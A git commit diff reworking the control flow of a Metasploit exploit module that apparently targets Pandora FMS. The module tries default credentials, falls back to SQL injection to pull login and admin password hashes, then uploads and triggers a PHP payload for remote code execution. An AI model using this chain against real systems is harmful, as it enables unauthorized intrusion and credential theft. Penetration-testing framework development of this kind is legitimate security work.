Modify exploit logic
jvazquez-r7
parent
4bbadc44d6
commit
b24e641e97
|
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def authenticate
|
||||
print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
|
||||
|
||||
# Attempt to login with default credentials (admin:pandora)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
|
@ -106,7 +106,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def login_hash
|
||||
print_status("#{peer} - Attempting to extract auto login hash")
|
||||
# Generate random string and convert to hex
|
||||
sqlq = rand_text_alpha(8)
|
||||
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
|
||||
|
|
@ -163,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def extract
|
||||
print_status("#{peer} - Attempting to extract admin password hash")
|
||||
# Generate random string and convert to hex
|
||||
sqlq = rand_text_alpha(8)
|
||||
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
|
||||
|
|
@ -286,29 +284,33 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
end
|
||||
|
||||
# Trigger Payload
|
||||
|
||||
def exploit
|
||||
# First try to authenticate using default or user-supplied credentials
|
||||
print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
|
||||
auth = authenticate
|
||||
|
||||
unless auth
|
||||
print_status("#{peer} - Attempting to extract auto login hash via SQLi")
|
||||
auth = login_hash
|
||||
end
|
||||
|
||||
unless auth
|
||||
print_status("#{peer} - Attempting to extract admin password hash with SQLi")
|
||||
extract
|
||||
fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Uploading PHP payload...")
|
||||
upload
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'images', @payload_name),
|
||||
'cookie' => @cookie
|
||||
}, 1)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
# First try to authenticate using default or user-supplied credentials
|
||||
if authenticate
|
||||
upload
|
||||
# If default credentials fail, try to extract loginhash via SQLi
|
||||
elsif login_hash
|
||||
upload
|
||||
extract
|
||||
# In the worst case, try to extract password hash
|
||||
else
|
||||
@rce_failed = true
|
||||
extract
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue